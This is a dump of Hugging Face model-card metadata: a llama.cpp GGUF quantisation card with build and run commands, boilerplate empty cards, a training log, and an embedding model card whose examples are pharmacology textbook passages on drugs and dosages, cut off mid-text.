modelId string | author string | last_modified timestamp[us, tz=UTC] | downloads int64 | likes int64 | library_name string | tags list | pipeline_tag string | createdAt timestamp[us, tz=UTC] | card string |
|---|---|---|---|---|---|---|---|---|---|
sizzlebop/MiniCPM4-8B-Q8_0-GGUF | sizzlebop | 2025-06-09T14:42:22Z | 0 | 0 | transformers | [
"transformers",
"gguf",
"llama-cpp",
"gguf-my-repo",
"text-generation",
"zh",
"en",
"base_model:openbmb/MiniCPM4-8B",
"base_model:quantized:openbmb/MiniCPM4-8B",
"license:apache-2.0",
"endpoints_compatible",
"region:us",
"conversational"
] | text-generation | 2025-06-09T14:41:47Z | ---
license: apache-2.0
language:
- zh
- en
pipeline_tag: text-generation
library_name: transformers
tags:
- llama-cpp
- gguf-my-repo
base_model: openbmb/MiniCPM4-8B
---
# sizzlebop/MiniCPM4-8B-Q8_0-GGUF
This model was converted to GGUF format from [`openbmb/MiniCPM4-8B`](https://huggingface.co/openbmb/MiniCPM4-8B) using llama.cpp via the ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space.
Refer to the [original model card](https://huggingface.co/openbmb/MiniCPM4-8B) for more details on the model.
## Use with llama.cpp
Install llama.cpp through brew (works on Mac and Linux)
```bash
brew install llama.cpp
```
Invoke the llama.cpp server or the CLI.
### CLI:
```bash
llama-cli --hf-repo sizzlebop/MiniCPM4-8B-Q8_0-GGUF --hf-file minicpm4-8b-q8_0.gguf -p "The meaning to life and the universe is"
```
### Server:
```bash
llama-server --hf-repo sizzlebop/MiniCPM4-8B-Q8_0-GGUF --hf-file minicpm4-8b-q8_0.gguf -c 2048
```
Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the Llama.cpp repo as well.
Step 1: Clone llama.cpp from GitHub.
```
git clone https://github.com/ggerganov/llama.cpp
```
Step 2: Move into the llama.cpp folder and build it with `LLAMA_CURL=1` flag along with other hardware-specific flags (for ex: LLAMA_CUDA=1 for Nvidia GPUs on Linux).
```
cd llama.cpp && LLAMA_CURL=1 make
```
Step 3: Run inference through the main binary.
```
./llama-cli --hf-repo sizzlebop/MiniCPM4-8B-Q8_0-GGUF --hf-file minicpm4-8b-q8_0.gguf -p "The meaning to life and the universe is"
```
or
```
./llama-server --hf-repo sizzlebop/MiniCPM4-8B-Q8_0-GGUF --hf-file minicpm4-8b-q8_0.gguf -c 2048
```
|
Xara2west/gpt2-finetuned-coned7 | Xara2west | 2025-06-09T14:27:53Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"gpt2",
"text-generation",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-06-09T14:27:19Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
efraimdahl/syncopation-transformer-combined | efraimdahl | 2025-06-09T14:27:25Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"generated_from_trainer",
"endpoints_compatible",
"region:us"
] | null | 2025-06-09T13:43:22Z | ---
library_name: transformers
tags:
- generated_from_trainer
model-index:
- name: syncopation-transformer-combined
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# syncopation-transformer-combined
This model is a fine-tuned version of [](https://huggingface.co/) on an unknown dataset.
It achieves the following results on the evaluation set:
- Loss: 0.0537
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 5
- eval_batch_size: 8
- seed: 42
- optimizer: Use OptimizerNames.ADAMW_TORCH with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: linear
- num_epochs: 25
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:-----:|:------:|:---------------:|
| 0.1919 | 1.0 | 4350 | 0.0718 |
| 0.0072 | 2.0 | 8700 | 0.0734 |
| 0.0009 | 3.0 | 13050 | 0.0603 |
| 0.049 | 4.0 | 17400 | 0.0770 |
| 0.0496 | 5.0 | 21750 | 0.0554 |
| 0.001 | 6.0 | 26100 | 0.0565 |
| 0.0027 | 7.0 | 30450 | 0.0561 |
| 0.0041 | 8.0 | 34800 | 0.0607 |
| 0.0273 | 9.0 | 39150 | 0.0565 |
| 0.0344 | 10.0 | 43500 | 0.0580 |
| 0.0246 | 11.0 | 47850 | 0.0557 |
| 0.0187 | 12.0 | 52200 | 0.0624 |
| 0.0828 | 13.0 | 56550 | 0.0523 |
| 0.059 | 14.0 | 60900 | 0.0537 |
| 0.2687 | 15.0 | 65250 | 0.0561 |
| 0.0593 | 16.0 | 69600 | 0.0565 |
| 0.0015 | 17.0 | 73950 | 0.0541 |
| 0.0023 | 18.0 | 78300 | 0.0558 |
| 0.0001 | 19.0 | 82650 | 0.0532 |
| 0.0026 | 20.0 | 87000 | 0.0547 |
| 0.0339 | 21.0 | 91350 | 0.0543 |
| 0.001 | 22.0 | 95700 | 0.0567 |
| 0.0553 | 23.0 | 100050 | 0.0545 |
| 0.0038 | 24.0 | 104400 | 0.0536 |
| 0.012 | 25.0 | 108750 | 0.0537 |
### Framework versions
- Transformers 4.51.3
- Pytorch 2.6.0+cu124
- Datasets 3.6.0
- Tokenizers 0.21.1
|
fernandabufon/model_bertimbau_base_toxicity_5_1e-05_0.1_0.1_32_fold_1 | fernandabufon | 2025-06-09T14:26:09Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"bert",
"text-classification",
"arxiv:1910.09700",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-classification | 2025-06-09T14:25:43Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
RikoteMaster/embedder-granite | RikoteMaster | 2025-06-09T14:23:46Z | 0 | 0 | sentence-transformers | [
"sentence-transformers",
"safetensors",
"xlm-roberta",
"sentence-similarity",
"feature-extraction",
"generated_from_trainer",
"dataset_size:34441",
"loss:MultipleNegativesRankingLoss",
"arxiv:1908.10084",
"arxiv:1705.00652",
"base_model:ibm-granite/granite-embedding-107m-multilingual",
"base_m... | sentence-similarity | 2025-06-09T14:02:09Z | ---
tags:
- sentence-transformers
- sentence-similarity
- feature-extraction
- generated_from_trainer
- dataset_size:34441
- loss:MultipleNegativesRankingLoss
base_model: ibm-granite/granite-embedding-107m-multilingual
widget:
- source_sentence: inhibitors as antifungal, and antibacterial agents. and in with
sulfonylureas, not combination insulin. During clinical tion in 0.4–0.9%. Adverse
an increased rate of infections (upper respiratory and tract), (when Tzd), hypoglycemia
(when a dose of insulin agogue lowered hypoglycemia. Linagliptin is the class
and appears have properties similar to and tin. It approved for and combination
with metformin, pioglitazone. COMBINATION THERAPY—ORAL ANTIDIABETIC & in 2 Diabetes
Mellitus Failure to maintain response over the owing a in mass, reduction physical
activity, mass, in remains disconcerting problem ment of type Multiple medications
may glycemic there a should initiated with biguanide. clinical failure monotherapy,
a agent or is be insulin dase inhibitor; sulfonylureas insulin because of adverse
safety concerns. Third-line multiple medications, or a injectable intensified
insulin
sentences:
- inhibitors such as antiviral, antifungal, and certain antibacterial agents. Saxagliptin
is approved as monotherapy and in combination with biguanides, sulfonylureas,
and Tzds. It has not been studied in combination with insulin. During clinical
trials, mono- and combination therapy with sitagliptin resulted in an HbA 1c reduc-
tion in the range of 0.4–0.9%. Adverse effects include an increased rate of infections
(upper respiratory tract and urinary tract), headaches, peripheral edema (when
combined with a Tzd), hypoglycemia (when combined with a sulfonylurea), and hypersensitivity
reactions (urticaria, facial edema). The dose of a concurrently administered insulin
secret- agogue or insulin may need to be lowered to prevent hypoglycemia. Linagliptin
is the most recently introduced drug in this class and appears to have properties
similar to sitagliptin and saxaglip- tin. It is approved for use as monotherapy
and in combination with metformin, glimepiride, and pioglitazone. COMBINATION
THERAPY—ORAL ANTIDIABETIC AGENTS & INJECTABLE MEDICATION Combination Therapy in
Type 2 Diabetes Mellitus Failure to maintain a good response to therapy over the
long term owing to a progressive decrease in beta-cell mass, reduction in physical
activity, decline in lean body mass, or increase in ectopic fat deposition remains
a disconcerting problem in the manage- ment of type 2 diabetes. Multiple medications
may be required to achieve glycemic control. Unless there is a contraindication,
medical therapy should be initiated with a biguanide. If clinical failure occurs
with metformin monotherapy, a second agent or insulin is added. The second-line
drug can be an insulin secret- agogue, Tzd, incretin-based therapy, amylin analog,
or a glucosi- dase inhibitor; preference is given to sulfonylureas or insulin
because of cost, adverse effects, and safety concerns. Third-line therapy can
include metformin, multiple other oral medications, or a noninsulin injectable
and metformin and intensified insulin
- '61. Glucocorticoids for gastrointestinal use: See Chapter 62. REFERENCES Alesci
S et al: Glucocorticoid-induced osteoporosis: From basic mechanisms to clinical
aspects. Neuroimmunomodulation 2005;12:1. Bamberger CM, Schulte HM, Chrousos GP:
Molecular determinants of gluco- corticoid receptor function and tissue sensitivity
to glucocorticoids. Endocr Rev 1996;17:245. Charmandari E, Kino T: Chrousos syndrome:
A seminal report, a phylogenetic enigma and the clinical implications of glucocorticoid
signaling changes. Eur J Clin Invest 2010;40:932. Charmandari E, Tsigos C, Chrousos
GP: Neuroendocrinology of stress. Ann Rev Physiol 2005;67:259. Chrousos GP: Stress
and disorders of the stress system. Nat Endocrinol Rev 2009;5:374. Chrousos GP,
Kino T: Glucocorticoid signaling in the cell: Expanding clinical implications
to complex human behavioral and somatic disorders. In: Glucocorticoids and mood:
Clinical manifestations, risk factors, and molecular mechanisms. Proc NY Acad
Sci 2009;1179:153. Elenkov IJ, Chrousos GP: Stress hormones, TH1/TH2 patterns,
pro/anti-in- flammatory cytokines and susceptibility to disease. Trends Endocrinol
Metab 1999;10:359. Elenkov IJ et al: Cytokine dysregulation, inflammation, and
wellbeing. Neuroimmunomodulation 2005;12:255. Franchimont D et al: Glucocorticoids
and inflammation revisited: The state of the art. Neuroimmunomodulation 2002–03;10:247.
Graber AL et al: Natural history of pituitary-adrenal recovery following long-term
suppression with corticosteroids. J Clin Endocrinol Metab 1965;25:11. Hochberg
Z, Pacak K, Chrousos GP: Endocrine withdrawal syndromes. Endocrine Rev 2003;24:523.
Kalantaridou S, Chrousos GP: Clinical review 148:'
- safely and effectively combined with 5-FU-, irinotecan-, and oxaliplatin-based
chemotherapy in the treatment of metastatic colorectal cancer. Bevacizumab is
FDA approved as a first-line treatment for metastatic colorectal cancer in combination
with any intravenous fluoropyrimidine-contain- ing regimen and is now also approved
in combination with che- motherapy for metastatic non-small lung cancer and breast
cancer. One potential advantage of this antibody is that it does not appear to
exacerbate the toxicities typically observed with cytotoxic che- motherapy. The
main safety concerns associated with bevacizumab include hypertension, an increased
incidence of arterial throm- boembolic events (transient ischemic attack, stroke,
angina, and myocardial infarction), wound healing complications, gastrointes-
tinal perforations, and proteinuria. Sorafenib is a small molecule that inhibits
multiple receptor tyrosine kinases (RTKs), especially VEGF-R2 and VEGF-R3, platelet-derived
growth factor-β (PDGFR-β), and raf kinase. It was initially approved for advanced
renal cell cancer and is also approved for advanced hepatocellular cancer. Sunitinib
is similar to sorafenib in that it inhibits multiple RTKs, although the specific
types are somewhat different. They include PDGFR-α and PDGFR-β, VEGF-R1, VEGF-R2,
VEGF-R3, and c-kit. It is approved for the treatment of advanced renal cell cancer
and for the treatment of gastrointestinal stromal tumors (GIST) after disease
progression on or with intolerance to imatinib. Pazopanib is a small molecule
that inhibits multiple RTKs, espe- cially VEGF-R2 and VEGF-R3, PDGFR-β, and raf
kinase. This oral agent is approved for the treatment of advanced renal cell cancer.
Sorafenib, sunitinib, and pazopanib are metabolized in the liver by the CYP3A4
system, and elimination is primarily hepatic with excretion in feces. Each of
these agents has potential interac-
- source_sentence: 774 VII that detected by parathyroid gland, increases in serum
phos- levels reduce the secretion. regulation is the net PTH serum calcium and
reduce serum at the amount increase the amount 24,25(OH) D produced. serum calcium
by reducing secretion. High phosphate by D calcium phosphate, has less effect,
such feedback is again appropriate. 1,25(OH) effect PTH patients chronic are loss
this 2 D-mediated loop intestinal absorption often leads secondary The D to PTH
being exploited with of absorption. Such useful the management of hyperparathy-
roidism chronic kidney be of 1,25(OH) also production This the loop in that FGF23
2 D promoting hypophosphatemia, turn inhibits and 2 production. HORMONAL OF
sentences:
- rier only when the meninges are inflamed. Concentrations in cerebrospinal fluid
are highly variable, ranging from 4% to 64% of serum levels in the setting of
meningeal inflammation. As with all antituberculous drugs, resistance to ethambutol
emerges rapidly when the drug is used alone. Therefore, ethambutol is always given
in combination with other antituberculous drugs. Ethambutol hydrochloride, 15–25
mg/kg, is usually given as a single daily dose in combination with isoniazid or
rifampin. The higher dose is recommended for treatment of tuberculous menin- gitis.
The dose of ethambutol is 50 mg/kg when a twice-weekly dosing schedule is used.
Adverse Reactions Hypersensitivity to ethambutol is rare. The most common serious
adverse event is retrobulbar neuritis, resulting in loss of visual acuity and
red-green color blindness. This dose-related adverse effect is more likely to
occur at dosages of 25 mg/kg/d continued for several months. At 15 mg/kg/d or
less, visual disturbances are very rare. Periodic visual acuity testing is desirable
if the 25 mg/kg/d dosage is used. Ethambutol is relatively contraindicated in
chil- dren too young to permit assessment of visual acuity and red- green color
discrimination. PYRAZINAMIDE Pyrazinamide (PZA) is a relative of nicotinamide.
It is stable and slightly soluble in water. It is inactive at neutral pH, but
at pH 5.5 it inhibits tubercle bacilli at concentrations of approximately 20 mcg/mL.
The drug is taken up by macrophages and exerts its activity against mycobacteria
residing within the acidic environ- ment of lysosomes. Pyrazinamide (PZA) N C
O NH2 N Mechanism of Action & Clinical Uses Pyrazinamide is converted to pyrazinoic
acid—the active form of the drug—by mycobacterial pyrazinamidase, which is encoded
by
- 774 SECTION VII Endocrine Drugs that is detected by the parathyroid gland, increases
in serum phos- phate levels reduce the ionized calcium, leading to enhanced PTH
secretion. Such feedback regulation is appropriate to the net effect of PTH to
raise serum calcium and reduce serum phosphate levels. Likewise, both calcium
and phosphate at high levels reduce the amount of 1,25(OH) 2 D produced by the
kidney and increase the amount of 24,25(OH) 2 D produced. High serum calcium works
directly and indirectly by reducing PTH secretion. High serum phosphate works
directly and indirectly by increasing FGF23 levels. Since 1,25(OH) 2 D raises
serum calcium and phosphate, whereas 24,25(OH) 2 D has less effect, such feedback
regulation is again appropriate. 1,25(OH) 2 D directly inhibits PTH secretion
(independent of its effect on serum calcium) by a direct inhibitory effect on
PTH gene transcription. This pro- vides yet another negative feedback loop. In
patients with chronic renal failure who frequently are deficient in producing
1,25(OH) 2 D, loss of this 1,25(OH) 2 D-mediated feedback loop coupled with impaired
phosphate excretion and intestinal calcium absorption often leads to secondary
hyperparathyroidism. The ability of 1,25(OH) 2 D to inhibit PTH secretion directly
is being exploited with calcitriol analogs that have less effect on serum calcium
because of their lesser effect on intestinal calcium absorption. Such drugs are
proving useful in the management of secondary hyperparathy- roidism accompanying
chronic kidney disease and may be useful in selected cases of primary hyperparathyroidism.
1,25(OH) 2 D also stimulates the production of FGF23. This completes the negative
feedback loop in that FGF23 inhibits 1,25(OH) 2 D production while promoting hypophosphatemia,
which in turn inhibits FGF23 production and stimulates 1,25(OH) 2 D production.
SECONDARY HORMONAL REGULATORS OF BONE MINERAL HOMEOST
- host disease after allogeneic stem cell trans- plantation. Cyclosporine has also
proved useful in a variety of autoimmune disorders, including uveitis, rheumatoid
arthritis, psoriasis, and asthma. Its combination with newer agents is show- ing
considerable efficacy in clinical and experimental settings where effective and
less toxic immunosuppression is needed. Newer for- mulations of cyclosporine have
been developed that are improving patient compliance (smaller, better tasting
pills) and increasing bioavailability. Tacrolimus Tacrolimus (FK 506) is an immunosuppressant
macrolide antibi- otic produced by Streptomyces tsukubaensis. It is not chemically
related to cyclosporine, but their mechanisms of action are similar. Both drugs
bind to cytoplasmic peptidylprolyl isomerases that are abundant in all tissues.
While cyclosporine binds to cyclophilin, tacrolimus binds to the immunophilin
FK-binding protein (FKBP). Both complexes inhibit calcineurin, which is necessary
for the activation of the T-cell-specific transcription factor NF-AT. On a weight
basis, tacrolimus is 10–100 times more potent than cyclosporine in inhibiting
immune responses. Tacrolimus is utilized for the same indications as cyclosporine,
particularly in organ and stem cell transplantation. Multicenter studies in the
USA and in Europe indicate that both graft and patient survival are similar for
the two drugs. Tacrolimus has proved to be effective therapy for preventing rejection
in solid-organ transplant patients even after failure of standard rejection therapy,
including anti-T- cell antibodies. It is now considered a standard prophylactic
agent (usually in combination with methotrexate or mycophenolate mofetil) for
graft-versus-host disease. Tacrolimus can be administered orally or intravenously.
The half-life of the intravenous form is approximately 9–12 hours. Like cyclosporine,
tacrolimus is metabolized primarily by P450 enzymes in the liver, and there is
potential for drug interactions. The dosage is determined by trough blood level
at
- source_sentence: Antiviral 865 TABLE Agents or (HSV) varicella-zoster virus (VZV)
Administration Recommended Dosage and Regimen Acyclovir1 Oral First treatment
mg tid mg 5 daily × Recurrent genital herpes mg 200 times daily 800 bid 3–5 tid
2 days Genital the host treatment Genital in host treatment 5 until healed Orolabial
treatment × days Varicella years) 800 mg qid days Zoster daily Intravenous HSV
5 in host mg/kg treatment 10–15 days Neonatal HSV infection 10–20 mg/kg × Varicella
the host treatment mg/kg q8h days (5% treatment lesion 4 Famciclovir1 episode
treatment mg × days genital 1000 day Genital in HIV-infected 500 5–10 days herpes
250 Genital in the HIV-infected 500 bid Orolabial or suppression 250-500 mg mg
days Oral herpes 1000 mg bid × 10 Recurrent mg Genital herpes HIV-infected 5–10
days herpes once suppression the
sentences:
- CHAPTER 49 Antiviral Agents 865 TABLE 49–1 Agents to treat or prevent herpes simplex
virus (HSV) and varicella-zoster virus (VZV) infections. Route of Administration
Use Recommended Adult Dosage and Regimen Acyclovir1 Oral First episode genital
herpes treatment 400 mg tid or 200 mg 5 times daily × 7–10 days Recurrent genital
herpes treatment 400 mg tid or 200 mg 5 times daily or 800 mg bid × 3–5 days or
800 mg tid × 2 days Genital herpes in the HIV-infected host treatment 400 mg 3–5
times daily × 5–10 days Genital herpes suppression in the HIV-infected host 400–800
mg bid–tid Herpes proctitis treatment 400 mg 5 times daily until healed Orolabial
herpes treatment 400 mg 5 times daily × 5 days Varicella treatment (age ≥ 2 years)
800 mg qid × 5 days Zoster treatment 800 mg 5 times daily × 7–10 days Intravenous
Severe HSV treatment 5 mg/kg q8h × 7–10 days Mucocutaneous herpes in the immunocompromised
host treatment 10 mg/kg q8h × 7–14 days Herpes encephalitis treatment 10–15 mg/kg
q8h × 14–21 days Neonatal HSV infection treatment 10–20 mg/kg q8h × 14–21 days
Varicella or zoster in the immunosuppressed host treatment 10 mg/kg q8h × 7 days
Topical (5% cream) Herpes labialis treatment Thin film covering lesion 5 times
daily × 4 days Famciclovir1 Oral First episode genital herpes treatment 500 mg
tid × 5–10 days Recurrent genital herpes treatment 1000 mg bid × 1 day Genital
herpes in the HIV-infected host treatment 500 mg bid × 5–10 days Genital herpes
suppression 250 mg bid Genital herpes suppression in the HIV-infected host 500
mg bid Orolabial herpes treatment 1500 mg once Orolabial or genital herpes suppression
250-500 mg bid Zoster 500 mg tid × 7 days Valacyclovir1 Oral First episode genital
herpes treatment 1000 mg bid × 10 days Recurrent genital herpes treatment 500
mg bid × 3 days Genital herpes in the HIV-infected host treatment 500–1000 mg
bid × 5–10 days Genital herpes suppression 500–1000 mg once daily Genital herpes
suppression in the HIV
- LA Human leukocyte antigen IFN Interferon IGIV Immune globulin intravenous IL
Interleukin LFA Leukocyte function-associated antigen MAB Monoclonal antibody
MHC Major histocompatibility complex NK cell Natural killer cell SCID Severe combined
immunodeficiency disease TCR T-cell receptor TGF-a Transforming growth factor-β
TH1, TH2 T helper cell types 1 and 2 TNF Tumor necrosis factor
- ', especially in adults with impaired renal function and prolonged elevation of
drug levels. The sudden absorption of postoperatively instilled kanamycin from
the peritoneal cavity (3–5 g) has resulted in curare-like neu- romuscular blockade
and respiratory arrest. Calcium gluconate and neostigmine can act as antidotes.
Although hypersensitivity is not common, prolonged applica- tion of neomycin-containing
ointments to skin and eyes has resulted in severe allergic reactions. ■ SPECTINOMYCIN
Spectinomycin is an aminocyclitol antibiotic that is structurally related to aminoglycosides.
It lacks amino sugars and glycosidic bonds. NH HN CH3 O O CH3 Spectinomycin O
CH3 HO O OH OH Spectinomycin is active in vitro against many gram-positive and
gram-negative organisms, but it is used almost solely as an alternative treatment
for drug-resistant gonorrhea or gonorrhea in penicillin-allergic patients. The
majority of gonococcal isolates are inhibited by 6 mcg/mL of spectinomycin. Strains
of gonococci may be resistant to spectinomycin, but there is no cross-resistance
with other drugs used in gonorrhea. Spectinomycin is rapidly absorbed after intramuscular
injection. A single dose of 40 mg/kg up to a maximum of 2 g is given. There is
pain at the injection site and, occasionally, fever and nausea. Nephrotoxicity
and anemia have been observed rarely. Spectinomycin is no longer available for
use in the United States but may be available elsewhere.'
- source_sentence: Against Gram-Positive Bacilli Aminoglycosides Carbapenems Carbapenems
Cephalosporins Chloramphenicol Tetracyclines Macrolides Penicillins Sulfonamides
Tetracyclines Tigecycline Trimethoprim TABLE Antimicrobial that require are in
with hepatic impairment. Dosage Needed in Contraindicated in Dosage Adjustment
Impairment amantadine, aminoglycosides, carbapenems, cycloserine, didanosine,
ethionamide, penicillins,3 pyrazinamide, stavudine, telavancin, telbivudine, telithromycin,
tenofovir, terbinafine, valacyclovir, zidovudine acid, (long-acting), tetracyclines2
Amprenavir, phenicol, indinavir, metronida- 2Except doxycycline and minocycline.
nafcillin and 4Except Alter Antimicrobi
sentences:
- Against Gram-Positive Cocci Against Gram-Negative Bacilli Aminoglycosides Aminoglycosides
Carbapenems Carbapenems Cephalosporins Chloramphenicol Chloramphenicol Quinolones
Clindamycin Rifampin Daptomycin Tetracyclines Glycopeptide antibiotics Tigecycline
Ketolides Macrolides Oxazolidinones Penicillins Quinolones Rifampin Streptogramins
Sulfonamides Tetracyclines Tigecycline Trimethoprim TABLE 51–5 Antimicrobial agents
that require dosage adjustment or are contraindicated in patients with renal or
hepatic impairment. Dosage Adjustment Needed in Renal Impairment Contraindicated
in Renal Impairment Dosage Adjustment Needed in Hepatic Impairment Acyclovir,
amantadine, aminoglycosides, aztreonam, carbapenems, cephalosporins,1 clarithromycin,
colistin, cycloserine, daptomycin, didanosine, emtricitabine, ethambutol, ethionamide,
famciclovir, fluconazole, flucytosine, foscarnet, ganciclovir, lamivudine, penicillins,3
pyrazinamide, quinolones, 4 rimantadine, stavudine, telavancin, telbivudine, telithromycin,
tenofovir, terbinafine, trimethoprim- sulfamethoxazole, valacyclovir, vancomycin,
zidovudine Cidofovir, methenamine, nalidixic acid, nitrofurantoin, sulfonamides
(long-acting), tetracyclines2 Amprenavir, atazanavir, chloram- phenicol, clindamycin,
